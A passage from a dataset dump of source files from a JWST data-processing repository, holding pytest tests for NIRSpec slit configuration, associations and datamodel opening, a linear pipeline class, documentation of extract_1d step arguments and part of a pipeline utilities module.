the get_open_msa_slits function.\n \"\"\"\n\n # Test 1: Reasonably normal as well\n msa_meta_id = 12\n msaconfl = get_file_path('msa_configuration.fits')\n dither_position = 1\n slitlet_info = nirspec.get_open_msa_slits(msaconfl, msa_meta_id, dither_position,\n slit_y_range=[-.5, .5])\n ref_slit = Slit(55, 9376, 1, 251, 26, -5.15, 0.55, 4, 1, '1111x', '95065_1', '2122',\n 0.13, -0.31716078999999997, -0.18092266)\n _compare_slits(slitlet_info[0], ref_slit)\n\n\ndef test_msa_configuration_no_background():\n \"\"\"\n Test the get_open_msa_slits function.\n \"\"\"\n # Test 2: Two main shutters, not allowed and should fail\n msa_meta_id = 13\n msaconfl = get_file_path('msa_configuration.fits')\n dither_position = 1\n with pytest.raises(MSAFileError):\n nirspec.get_open_msa_slits(msaconfl, msa_meta_id, dither_position,\n slit_y_range=[-.5, .5])\n\n\ndef test_msa_configuration_all_background():\n \"\"\"\n Test the get_open_msa_slits function.\n \"\"\"\n\n # Test 3: No non-background, not acceptable.\n msa_meta_id = 14\n msaconfl = get_file_path('msa_configuration.fits')\n dither_position = 1\n slitlet_info = nirspec.get_open_msa_slits(msaconfl, msa_meta_id, dither_position,\n slit_y_range=[-.5, .5])\n ref_slit = Slit(57, 8646, 1, 251, 24, -2.85, .55, 4, 0, '11x', 'background_57', 'bkg_57',\n 0, -0.5, -0.5)\n _compare_slits(slitlet_info[0], ref_slit)\n\n\n\ndef test_msa_configuration_row_skipped():\n \"\"\"\n Test the get_open_msa_slits function.\n \"\"\"\n\n # Test 4: One row is skipped, should be acceptable.\n msa_meta_id = 15\n msaconfl = get_file_path('msa_configuration.fits')\n dither_position = 1\n slitlet_info = nirspec.get_open_msa_slits(msaconfl, msa_meta_id, dither_position,\n slit_y_range=[-.5, .5])\n ref_slit = Slit(58, 8646, 1, 251, 24, -2.85, 5.15, 4, 1, '11x1011', '95065_1', '2122',\n 0.130, -0.31716078999999997, -0.18092266)\n _compare_slits(slitlet_info[0], ref_slit)\n\n\ndef test_msa_configuration_multiple_returns():\n \"\"\"\n Test the get_open_msa_slits function.\n \"\"\"\n # Test 4: One row is skipped, should be acceptable.\n msa_meta_id = 16\n msaconfl = get_file_path('msa_configuration.fits')\n dither_position = 1\n slitlet_info = nirspec.get_open_msa_slits(msaconfl, msa_meta_id, dither_position,\n slit_y_range=[-.5, .5])\n ref_slit1 = Slit(59, 8651, 1, 256, 24, -2.85, 5.15, 4, 1, '11x1011', '95065_1', '2122',\n 0.13000000000000003, -0.31716078999999997, -0.18092266)\n ref_slit2 = Slit(60, 11573, 1, 258, 32, -2.85, 4, 4, 2, '11x111', '95065_2', '172',\n 0.70000000000000007, -0.31716078999999997, -0.18092266)\n _compare_slits(slitlet_info[0], ref_slit1)\n _compare_slits(slitlet_info[1], ref_slit2)\n\n\nopen_shutters = [[24], [23, 24], [22, 23, 25, 27], [22, 23, 25, 27, 28]]\nmain_shutter = [24, 23, 25, 28]\nresult = [\"x\", \"x1\", \"110x01\", \"110101x\"]\ntest_data = list(zip(open_shutters, main_shutter, result))\n\[email protected](('open_shutters', 'main_shutter', 'result'),\n test_data)\ndef test_shutter_state(open_shutters, main_shutter, result):\n shutter_state = nirspec._shutter_id_to_str(open_shutters, main_shutter)\n assert shutter_state == result\n\n\ndef test_slit_projection_on_detector():\n step = assign_wcs_step.AssignWcsStep()\n\n hdul = create_nirspec_fs_file(grating=\"G395M\", filter=\"OPAQUE\", lamp=\"ARGON\")\n hdul[0].header['DETECTOR'] = 'NRS2'\n im = datamodels.ImageModel(hdul)\n\n refs = {}\n for reftype in step.reference_file_types:\n refs[reftype] = step.get_reference_file(im, reftype)\n\n open_slits = nirspec.get_open_slits(im, refs)\n assert len(open_slits) == 1\n assert open_slits[0].name == \"S200B1\"\n\n hdul[0].header['DETECTOR'] = 'NRS1'\n im = datamodels.ImageModel(hdul)\n\n open_slits = nirspec.get_open_slits(im, refs)\n assert len(open_slits) == 4\n names = [s.name for s in open_slits]\n assert \"S200A1\" in names\n assert \"S200A2\" in names\n assert \"S400A1\" in names\n assert \"S1600A1\" in names\n\n\ndef test_missing_msa_file():\n image = create_nirspec_mos_file()\n model = datamodels.ImageModel(image)\n\n model.meta.instrument.msa_metadata_file = \"\"\n with pytest.raises(MSAFileError):\n assign_wcs_step.AssignWcsStep.call(model)\n\n model.meta.instrument.msa_metadata_file = \"missing.fits\"\n with pytest.raises(MSAFileError):\n assign_wcs_step.AssignWcsStep.call(model)\n\n\ndef test_open_slits():\n \"\"\" Test that get_open_slits works with MSA data.\n\n Issue #2321\n \"\"\"\n image = create_nirspec_mos_file()\n model = datamodels.ImageModel(image)\n msaconfl = get_file_path('msa_configuration.fits')\n\n model.meta.instrument.msa_metadata_file = msaconfl\n model.meta.instrument.msa_metadata_id = 12\n\n slits = nirspec.get_open_slits(model)\n assert len(slits) == 1\n\n\ndef test_shutter_size_on_sky():\n \"\"\"\n Test the size of a MOS shutter on sky is ~ .2 x .4 arcsec.\n \"\"\"\n image = create_nirspec_mos_file()\n model = datamodels.ImageModel(image)\n msaconfl = get_file_path('msa_configuration.fits')\n\n model.meta.instrument.msa_metadata_file = msaconfl\n model.meta.instrument.msa_metadata_id = 12\n\n refs = create_reference_files(model)\n\n pipe = nirspec.create_pipeline(model, refs, slit_y_range=(-.5, .5))\n w = wcs.WCS(pipe)\n model.meta.wcs = w\n slit = w.get_transform('slit_frame', 'msa_frame').slits[0]\n wslit = nirspec.nrs_wcs_set_input(model, slit.name)\n virtual_corners_x = [-.5, -.5, .5, .5, -.5]\n virtual_corners_y = [-.5, .5, .5, -.5, -.5]\n input_lam = [2e-6] * 5\n\n slit2world = wslit.get_transform('slit_frame', 'world')\n ra, dec, lam = slit2world(virtual_corners_x,\n virtual_corners_y,\n input_lam)\n sky = coords.SkyCoord(ra*u.deg, dec*u.deg)\n sep_x = sky[0].separation(sky[3]).to(u.arcsec)\n sep_y = sky[0].separation(sky[1]).to(u.arcsec)\n\n assert sep_x.value > 0.193\n assert sep_x.value < 0.194\n assert sep_y.value > 0.45\n assert sep_y.value < 0.46\n" }, { "alpha_fraction": 0.6375404596328735, "alphanum_fraction": 0.6407766938209534, "avg_line_length": 27.090909957885742, "blob_id": "d184fb5e431f08851757a963385d0559b01d4c59", "content_id": "f8c1ec5858b562c785bc9cf48410ee1ef63f2385", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 927, "license_type": "permissive", "max_line_length": 55, "num_lines": 33, "path": "/jwst/tests_nightly/general/associations/test_generate.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"Test general asn_generate operations\"\"\"\nimport pytest\n\nfrom jwst.associations import (\n generate,\n load_asn\n)\n\n\[email protected]\ndef test_generate(full_pool_rules):\n \"\"\"Run a full sized pool using all rules\"\"\"\n pool, rules, pool_fname = full_pool_rules\n asns = generate(pool, rules)\n assert len(asns) == 99\n for asn in asns:\n asn_name, asn_store = asn.dump()\n asn_table = load_asn(asn_store)\n schemas = rules.validate(asn_table)\n assert len(schemas) > 0\n\n\[email protected]\ndef test_serialize(full_pool_rules):\n \"\"\"Test serializing roundtripping\"\"\"\n pool, rules, pool_fname = full_pool_rules\n asns = generate(pool, rules)\n for asn in asns:\n for format in asn.ioregistry:\n fname, serialized = asn.dump(format=format)\n assert serialized is not None\n recovered = load_asn(serialized)\n assert recovered is not None\n" }, { "alpha_fraction": 0.40021929144859314, "alphanum_fraction": 0.48903509974479675, "avg_line_length": 45.598541259765625, "blob_id": "7f3d5bdeacc709ed53a41a24ea5f5d6eff860c81", "content_id": "8378f455db61bb13dcd7f78d3f67a3ed96e542af", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6384, "license_type": "permissive", "max_line_length": 86, "num_lines": 137, "path": "/jwst/tests_nightly/general/nirspec/test_nirspec_steps.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.tests.base_classes import BaseJWSTTestSteps\nfrom jwst.tests.base_classes import pytest_generate_tests # noqa: F401\n\nfrom jwst.refpix import RefPixStep\nfrom jwst.dark_current import DarkCurrentStep\nfrom jwst.dq_init import DQInitStep\nfrom jwst.extract_1d import Extract1dStep\nfrom jwst.extract_2d import Extract2dStep\nfrom jwst.flatfield import FlatFieldStep\nfrom jwst.group_scale import GroupScaleStep\nfrom jwst.jump import JumpStep\nfrom jwst.linearity import LinearityStep\nfrom jwst.photom import PhotomStep\nfrom jwst.saturation import SaturationStep\nfrom jwst.superbias import SuperBiasStep\n\n\n# Parameterized regression tests for NIRISS processing\n# All tests in this set run with 1 input file and\n# only generate 1 output for comparison.\n#\[email protected]\nclass TestNIRSpecSteps(BaseJWSTTestSteps):\n input_loc = 'nirspec'\n\n params = {'test_steps':\n [dict(input='jw00023001001_01101_00001_NRS1_dq_init.fits',\n test_dir='test_bias_drift',\n step_class=RefPixStep,\n step_pars=dict(odd_even_columns=True,\n use_side_ref_pixels=False,\n side_smoothing_length=10,\n side_gain=1.0),\n output_truth='jw00023001001_01101_00001_NRS1_bias_drift.fits',\n output_hdus=[],\n id='refpix_nirspec'\n ),\n dict(input='jw00023001001_01101_00001_NRS1_saturation.fits',\n test_dir='test_dark_step',\n step_class=DarkCurrentStep,\n step_pars=dict(),\n output_truth='jw00023001001_01101_00001_NRS1_dark_current.fits',\n output_hdus=[],\n id='dark_current_nirspec'\n ),\n dict(input='jw00023001001_01101_00001_NRS1_uncal.fits',\n test_dir='test_dq_init',\n step_class=DQInitStep,\n step_pars=dict(),\n output_truth='jw00023001001_01101_00001_NRS1_dq_init.fits',\n output_hdus=[],\n id='dq_init_nirspec'\n ),\n dict(input='jw00023001001_01101_00001_NRS1_cal.fits',\n test_dir='test_extract_1d',\n step_class=Extract1dStep,\n step_pars=dict(),\n output_truth='jw00023001001_01101_00001_NRS1_spec.fits',\n output_hdus=[],\n id='extract1d_nirspec'\n ),\n dict(input='jw00023001001_01101_00001_NRS1_assign_wcs.fits',\n test_dir='test_extract_2d',\n step_class=Extract2dStep,\n step_pars=dict(),\n output_truth='jw00023001001_01101_00001_NRS1_extract_2d.fits',\n output_hdus=[],\n id='extract2d_nirspec'\n ),\n dict(input='jw00023001001_01101_00001_NRS1_extract_2d.fits',\n test_dir='test_flat_field',\n step_class=FlatFieldStep,\n step_pars=dict(save_interpolated_flat=True),\n output_truth='jw00023001001_01101_00001_NRS1_flat_field.fits',\n output_hdus=[],\n id='flat_field_nirspec'\n ),\n dict(input='NRSIRS2_230_491_uncal.fits',\n test_dir='test_group_scale',\n step_class=GroupScaleStep,\n step_pars=dict(),\n output_truth='NRSIRS2_230_491_groupscale.fits',\n output_hdus=[],\n id='group_scale_nirspec'\n ),\n dict(input='jw00023001001_01101_00001_NRS1_linearity.fits',\n test_dir='test_jump',\n step_class=JumpStep,\n step_pars=dict(rejection_threshold=50.0),\n output_truth='jw00023001001_01101_00001_NRS1_jump.fits',\n output_hdus=[],\n id='jump_nirspec'\n ),\n dict(input='jw00023001001_01101_00001_NRS1_dark_current.fits',\n test_dir='test_linearity',\n step_class=LinearityStep,\n step_pars=dict(),\n output_truth='jw00023001001_01101_00001_NRS1_linearity.fits',\n output_hdus=[],\n id='linearity_nirspec'\n ),\n dict(input='jw00023001001_01101_00001_NRS1_flat_field.fits',\n test_dir='test_photom',\n step_class=PhotomStep,\n step_pars=dict(),\n output_truth='jw00023001001_01101_00001_NRS1_photom.fits',\n output_hdus=[],\n id='photom_nirspec'\n ),\n dict(input='jw84600007001_02101_00001_nrs1_superbias.fits',\n test_dir='test_bias_drift',\n step_class=RefPixStep,\n step_pars=dict(),\n output_truth='jw84600007001_02101_00001_nrs1_refpix.fits',\n output_hdus=[],\n id='refpix_nirspec_irs2'\n ),\n dict(input='jw00023001001_01101_00001_NRS1_bias_drift.fits',\n test_dir='test_saturation',\n step_class=SaturationStep,\n step_pars=dict(),\n output_truth='jw00023001001_01101_00001_NRS1_saturation.fits',\n output_hdus=[],\n id='saturation_nirspec'\n ),\n dict(input='jw00011001001_01106_00001_NRS2_saturation.fits',\n test_dir='test_superbias',\n step_class=SuperBiasStep,\n step_pars=dict(),\n output_truth='jw00011001001_01106_00001_NRS2_superbias.fits',\n output_hdus=[],\n id='superbias_nirspec'\n )\n ]\n }\n" }, { "alpha_fraction": 0.64786696434021, "alphanum_fraction": 0.6619667410850525, "avg_line_length": 35.394737243652344, "blob_id": "e0e24d396fcf48db85ac7308f81c5331042fd620", "content_id": "0558a1e0bce2871d8b57b292c0880a48dbeb921c", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2766, "license_type": "permissive", "max_line_length": 89, "num_lines": 76, "path": "/jwst/tests_nightly/general/associations/test_main.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"test_associations: Test of general Association functionality.\"\"\"\nimport re\n\nimport pytest\n\nfrom jwst.associations.main import Main\n\n\[email protected](\n reason='Takes too long and is not currently contributing to any actual testing'\n)\[email protected]\ndef test_script(full_pool_rules):\n \"\"\"Test full run of the script code\"\"\"\n pool, rules, pool_fname = full_pool_rules\n\n ref_rule_set = {\n 'candidate_Asn_Coron', 'discover_Asn_TSO', 'candidate_Asn_Lv2NRSFSS',\n 'candidate_Asn_SpectralTarget', 'candidate_Asn_TSO', 'candidate_Asn_WFSCMB',\n 'candidate_Asn_Lv2SpecSpecial', 'candidate_Asn_Image', 'candidate_Asn_IFU',\n 'candidate_Asn_Lv2NRSMSA', 'candidate_Asn_Lv2Image', 'candidate_Asn_Lv2Spec',\n 'discover_Asn_AMI', 'candidate_Asn_AMI', 'candidate_Asn_Lv2ImageSpecial',\n 'candidate_Asn_Lv2SpecTSO', 'candidate_Asn_SpectralSource',\n 'candidate_Asn_Lv2WFSS', 'discover_Asn_Coron', 'candidate_Asn_WFSS_NIS',\n 'discover_Asn_IFU', 'candidate_Asn_Lv2WFSC',\n 'candidate_Asn_Lv2ImageNonScience', 'discover_Asn_SpectralTarget',\n 'candidate_Asn_Lv2ImageTSO', 'discover_Asn_SpectralSource',\n 'discover_Asn_Image', 'candidate_Asn_Lv2FGS', 'candidate_Asn_Lv3SpecAux'\n }\n\n generated = Main([pool_fname, '--dry-run'])\n asns = generated.associations\n assert len(asns) == 938\n assert len(generated.orphaned) == 61\n found_rules = set(\n asn['asn_rule']\n for asn in asns\n )\n assert ref_rule_set == found_rules\n\n\[email protected]\ndef test_asn_candidates(full_pool_rules):\n \"\"\"Test basic candidate selection\"\"\"\n pool, rules, pool_fname = full_pool_rules\n\n generated = Main([pool_fname, '--dry-run', '-i', 'o001'])\n assert len(generated.associations) == 12\n generated = Main([pool_fname, '--dry-run', '-i', 'o001', 'o002'])\n assert len(generated.associations) == 24\n\n\[email protected]\ndef test_version_id(full_pool_rules):\n \"\"\"Test that version id is properly included\"\"\"\n pool, rules, pool_fname = full_pool_rules\n\n generated = Main([pool_fname, '--dry-run', '-i', 'o001', '--version-id'])\n regex = re.compile(r'\\d{3}t\\d{6}')\n for asn in generated.associations:\n assert regex.search(asn.asn_name)\n\n version_id = 'mytestid'\n generated = Main([pool_fname, '--dry-run', '-i', 'o001', '--version-id', version_id])\n for asn in generated.associations:\n assert version_id in asn.asn_name\n\n\[email protected]\ndef test_pool_as_parameter(full_pool_rules):\n \"\"\"Test passing the pool as an object\"\"\"\n pool, rules, pool_fname = full_pool_rules\n\n full = Main([pool_fname, '--dry-run'])\n full_as_param = Main(['--dry-run'], pool=pool)\n assert len(full.associations) == len(full_as_param.associations)\n" }, { "alpha_fraction": 0.6159745454788208, "alphanum_fraction": 0.6247661709785461, "avg_line_length": 29.20339012145996, "blob_id": "89715acf41e8305e9227caf4b4e5518f39697e89", "content_id": "b7e1359c95b40fada42d4396f2a3c443690da8b8", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5346, "license_type": "permissive", "max_line_length": 75, "num_lines": 177, "path": "/jwst/datamodels/tests/test_open.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"\nTest datamodel.open\n\"\"\"\n\nimport os\nimport os.path\nimport warnings\n\nimport pytest\nimport numpy as np\nfrom astropy.io import fits\n\nfrom jwst.datamodels import (DataModel, ModelContainer, ImageModel,\n ReferenceFileModel, ReferenceImageModel, ReferenceCubeModel,\n ReferenceQuadModel, FlatModel, MaskModel, NrcImgPhotomModel, GainModel,\n ReadnoiseModel, DistortionModel)\nfrom jwst import datamodels\n\n\ndef test_open_fits():\n \"\"\"Test opening a model from a FITS file\"\"\"\n\n with warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\", \"model_type not found\")\n fits_file = t_path('test.fits')\n with datamodels.open(fits_file) as model:\n assert isinstance(model, DataModel)\n\n\ndef test_open_fits_s3(s3_root_dir):\n \"\"\"Test opening a model from a FITS file on S3\"\"\"\n path = str(s3_root_dir.join(\"test.fits\"))\n with DataModel() as dm:\n dm.save(path)\n\n with datamodels.open(\"s3://test-s3-data/test.fits\") as m:\n assert isinstance(m, DataModel)\n\n\ndef test_open_asdf_s3(s3_root_dir):\n \"\"\"Test opening a model from an ASDF file on S3\"\"\"\n path = str(s3_root_dir.join(\"test.asdf\"))\n with DataModel() as dm:\n dm.save(path)\n\n with datamodels.open(\"s3://test-s3-data/test.asdf\") as m:\n assert isinstance(m, DataModel)\n\n\ndef test_open_association():\n \"\"\"Test for opening an association\"\"\"\n\n asn_file = t_path('association.json')\n with warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\", \"model_type not found\")\n with datamodels.open(asn_file) as c:\n assert isinstance(c, ModelContainer)\n for model in c:\n assert model.meta.asn.table_name == \"association.json\"\n assert model.meta.asn.pool_name == \"pool\"\n\n\ndef test_container_open_asn_with_sourcecat():\n path = t_path(\"association_w_cat.json\")\n with datamodels.open(path, asn_exptypes=\"science\") as c:\n for model in c:\n assert model.meta.asn.table_name == \"association_w_cat.json\"\n\n\ndef test_open_shape():\n init = (200, 200)\n with datamodels.open(init) as model:\n assert type(model) == ImageModel\n\n\ndef test_open_illegal():\n with pytest.raises(ValueError):\n init = 5\n datamodels.open(init)\n\n\ndef test_open_hdulist():\n hdulist = fits.HDUList()\n data = np.empty((50, 50), dtype=np.float32)\n primary = fits.PrimaryHDU()\n hdulist.append(primary)\n science = fits.ImageHDU(data=data, name='SCI')\n hdulist.append(science)\n\n with datamodels.open(hdulist) as model:\n assert type(model) == ImageModel\n\n\ndef test_open_image():\n with warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\", \"model_type not found\")\n image_name = t_path('jwst_image.fits')\n with datamodels.open(image_name) as model:\n assert type(model) == ImageModel\n\n\ndef test_open_reference_files():\n files = {'nircam_flat.fits' : FlatModel,\n 'nircam_mask.fits' : MaskModel,\n 'nircam_photom.fits' : NrcImgPhotomModel,\n 'nircam_gain.fits' : GainModel,\n 'nircam_readnoise.fits' : ReadnoiseModel}\n\n with warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\", \"model_type not found\")\n for base_name, klass in files.items():\n file = t_path(base_name)\n model = datamodels.open(file)\n if model.shape:\n ndim = len(model.shape)\n else:\n ndim = 0\n\n if ndim == 0:\n my_klass = ReferenceFileModel\n elif ndim == 2:\n my_klass = ReferenceImageModel\n elif ndim == 3:\n my_klass = ReferenceCubeModel\n elif ndim == 4:\n my_klass = ReferenceQuadModel\n else:\n my_klass = None\n\n assert isinstance(model, my_klass)\n model.close()\n\n model = klass(file)\n assert isinstance(model, klass)\n model.close()\n\n\ndef test_open_fits_readonly(tmpdir):\n \"\"\"Test opening a FITS-format datamodel that is read-only on disk\"\"\"\n tmpfile = str(tmpdir.join('readonly.fits'))\n data = np.arange(100, dtype=np.float).reshape(10, 10)\n\n with ImageModel(data=data) as model:\n model.meta.telescope = 'JWST'\n model.meta.instrument.name = 'NIRCAM'\n model.meta.instrument.detector = 'NRCA4'\n model.meta.instrument.channel = 'SHORT'\n model.save(tmpfile)\n\n os.chmod(tmpfile, 0o440)\n assert os.access(tmpfile, os.W_OK) == False\n\n with datamodels.open(tmpfile) as model:\n assert model.meta.telescope == 'JWST'\n\n\ndef test_open_asdf_readonly(tmpdir):\n tmpfile = str(tmpdir.join('readonly.asdf'))\n\n with DistortionModel() as model:\n model.meta.telescope = 'JWST'\n model.meta.instrument.name = 'NIRCAM'\n model.meta.instrument.detector = 'NRCA4'\n model.meta.instrument.channel = 'SHORT'\n model.save(tmpfile)\n\n os.chmod(tmpfile, 0o440)\n assert os.access(tmpfile, os.W_OK) == False\n\n with datamodels.open(tmpfile) as model:\n assert model.meta.telescope == 'JWST'\n\n# Utilities\ndef t_path(partial_path):\n \"\"\"Construction the full path for test files\"\"\"\n test_dir = os.path.join(os.path.dirname(__file__), 'data')\n return os.path.join(test_dir, partial_path)\n" }, { "alpha_fraction": 0.7036262154579163, "alphanum_fraction": 0.7071129679679871, "avg_line_length": 33.975608825683594, "blob_id": "5cc95bcbc5b77c279099ed98afd182fe1aced751", "content_id": "70d693754124844a9b8c349e411012265355e547", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1434, "license_type": "permissive", "max_line_length": 60, "num_lines": 41, "path": "/jwst/pipeline/linear_pipeline.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "#\n# Simple linear pipeline\n\nfrom ..stpipe import LinearPipeline\n\nfrom ..ipc.ipc_step import IPCStep\nfrom ..dq_init.dq_init_step import DQInitStep\nfrom ..refpix.refpix_step import RefPixStep\nfrom ..saturation.saturation_step import SaturationStep\nfrom ..dark_current.dark_current_step import DarkCurrentStep\nfrom ..linearity.linearity_step import LinearityStep\nfrom ..jump.jump_step import JumpStep\nfrom ..ramp_fitting.ramp_fit_step import RampFitStep\nfrom ..assign_wcs.assign_wcs_step import AssignWcsStep\nfrom ..extract_2d.extract_2d_step import Extract2dStep\nfrom ..flatfield.flat_field_step import FlatFieldStep\nfrom ..persistence.persistence_step import PersistenceStep\nfrom ..straylight.straylight_step import StraylightStep\nfrom ..fringe.fringe_step import FringeStep\nfrom ..photom.photom_step import PhotomStep\n\n\nclass TestLinearPipeline(LinearPipeline):\n\n pipeline_steps = [\n ('ipc', IPCStep),\n ('dq_init', DQInitStep),\n ('refpix', RefPixStep),\n ('saturation', SaturationStep),\n ('dark_current', DarkCurrentStep),\n ('linearity', LinearityStep),\n ('jump', JumpStep),\n ('ramp_fit', RampFitStep),\n ('assign_wcs', AssignWcsStep),\n ('extract_2d', Extract2dStep),\n ('flat_field', FlatFieldStep),\n ('persistence', PersistenceStep),\n ('straylight', StraylightStep),\n ('fringe', FringeStep),\n ('photom', PhotomStep)\n ]\n" }, { "alpha_fraction": 0.7488080859184265, "alphanum_fraction": 0.75417160987854, "avg_line_length": 53.129032135009766, "blob_id": "26393a45e078c48d9da9c9fa6d4ba8e6f6c926a8", "content_id": "76ee2b7c2e653f7a66c8e1b433b96da091e4fa43", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3356, "license_type": "permissive", "max_line_length": 82, "num_lines": 62, "path": "/docs/jwst/extract_1d/arguments.rst", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "Step Arguments\n==============\n\nThe ``extract_1d`` step has six step-specific arguments.\n\n``--smoothing_length``\n If ``smoothing_length`` is greater than 1 (and is an odd integer), the\n background will be smoothed in the dispersion direction with a boxcar of\n this width. If ``smoothing_length`` is None (the default), the step will\n attempt to read the value from the EXTRACT1D reference file. If a value was\n specified in the reference file, that will be used. Note that in this\n case a different value can be specified for each slit. If no value was\n specified either by the user or in the EXTRACT1D reference file, no background\n smoothing will be done.\n\n``--bkg_order``\n This is the order of a polynomial function to be fit to the background\n regions. The fit is done independently for each column (or row, if the\n dispersion is vertical) of the input image, and the fitted curve will be\n subtracted from the target data. ``bkg_order`` = 0 (the minimum allowed\n value) means to fit a constant. The user-supplied value (if any)\n overrides the value in the EXTRACT1D reference file. If neither is specified, a\n value of 0 will be used. If a sufficient number of valid data points is\n unavailable to construct the polynomial fit, the fit will be forced to\n 0 for that particular column (or row).\n\n``--log_increment``\n Most log messages are suppressed while looping over integrations, i.e. when\n the input is a CubeModel or a 3-D SlitModel. Messages will be logged while\n processing the first integration, but since they would be the same for\n every integration, most messages will only be written once. However, since\n there can be hundreds or thousands of integrations, which can take a long\n time to process, it would be useful to log a message every now and then to\n let the user know that the step is still running.\n\n ``log_increment`` is an integer, with default value 50. If it is greater\n than 0, an INFO message will be printed every ``log_increment``\n integrations, e.g. \"... 150 integrations done\".\n\n``--subtract_background``\n This is a boolean flag to specify whether the background should be\n subtracted. If None, the value in the EXTRACT1D reference file (if any)\n will be used. If not None, this parameter overrides the value in the\n reference file.\n\n``--use_source_posn``\n This is a boolean flag to specify whether the target and background extraction\n region locations specified in the EXTRACT1D reference file should be shifted\n to account for the expected position of the source. If None (the default),\n the step will make the decision of whether to use the source position based\n on the observing mode and the source type. The source position will only be\n used for point sources and for modes where the source could be located\n off-center due to things like nodding or dithering. If turned on, the sky\n (RA/Dec) position of the source is used in conjunction with the World\n Coordinate System (WCS) to compute the x/y source location. For long-slit\n type modes (e.g. MIRI LRS and NIRSpec fixed-slit and MOS), only the position\n in the cross-dispersion direction is used to potentially offset the\n extraction regions in that direction.\n\n``--apply_apcorr``\n Switch to select whether or not to apply an APERTURE correction during the\n Extract1dStep processing. Default is ``True``\n" }, { "alpha_fraction": 0.6746857166290283, "alphanum_fraction": 0.6785869002342224, "avg_line_length": 37.773109436035156, "blob_id": "ec7ddd8cfef55e316ecd83871333394b68fe8a0a", "content_id": "404789f9bd5376506ce73586c9d9bf5bd93e3e87", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4614, "license_type": "permissive", "max_line_length": 80, "num_lines": 119, "path": "/jwst/stpipe/utilities.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "# Copyright (C) 2010 Association of Universities for Research in Astronomy(AURA)\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n#\n# 3. The name of AURA and its representatives may not be used to\n# endorse or promote products derived from this software without\n# specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY AURA ``AS IS'' AND ANY EXPRESS OR IMPLIED\n# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL AURA BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS\n# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR\n# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\n# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH\n# DAMAGE.\n\"\"\"\nUtilities\n\"\"\"\nimport inspect\nimport os\nimport sys\n\n\ndef import_class(full_name, subclassof=object, config_file=None):\n \"\"\"\n Import the Python class `full_name` given in full Python package format,\n e.g.::\n\n package.another_package.class_name\n\n Return the imported class. Optionally, if `subclassof` is not None\n and is a Python class, make sure that the imported class is a\n subclass of `subclassof`.\n \"\"\"\n # Understand which class we need to instantiate. The class name is given in\n # full Python package notation, e.g.\n # package.subPackage.subsubpackage.className\n # in the input parameter `full_name`. This means that\n # 1. We HAVE to be able to say\n # from package.subPackage.subsubpackage import className\n # 2. If `subclassof` is defined, the newly imported Python class MUST be a\n # subclass of `subclassof`, which HAS to be a Python class.\n\n if config_file is not None:\n sys.path.insert(0, os.path.dirname(config_file))\n\n try:\n full_name = full_name.strip()\n package_name, sep, class_name = full_name.rpartition('.')\n if not package_name:\n raise ImportError(\"{0} is not a Python class\".format(full_name))\n imported = __import__(\n package_name, globals(), locals(), [class_name, ], level=0)\n\n step_class = getattr(imported, class_name)\n\n if not isinstance(step_class, type):\n raise TypeError(\n 'Object {0} from package {1} is not a class'.format(\n class_name, package_name))\n elif not issubclass(step_class, subclassof):\n raise TypeError(\n 'Class {0} from package {1} is not a subclass of {2}'.format(\n class_name, package_name, subclassof.__name__))\n finally:\n if config_file is not None:\n del sys.path[0]\n\n return step_class\n\n\ndef get_spec_file_path(step_class):\n \"\"\"\n Given a Step (sub)class, divine and return the full path to the\n corresponding spec file. Use the fact that by convention, the spec\n file is in the same directory as the `step_class` source file. It\n has the name of the Step (sub)class and extension .spec.\n \"\"\"\n try:\n step_source_file = inspect.getfile(step_class)\n except TypeError:\n return None\n step_source_file = os.path.abspath(step_source_file)\n\n # Since `step_class` could be defined in a file called whatever,\n # we need the source file basedir and the class name.\n dir = os.path.dirname(step_source_file)\n return os.path.join(dir, step_class.__name__ + '.spec')\n\n\ndef find_spec_file(step_class):\n \"\"\"\n Return the full path of the given Step subclass `step_class`, if\n it exists or None if it does not.\n \"\"\"\n spec_file = get_spec_file_path(step_class)\n if spec_file is not None and 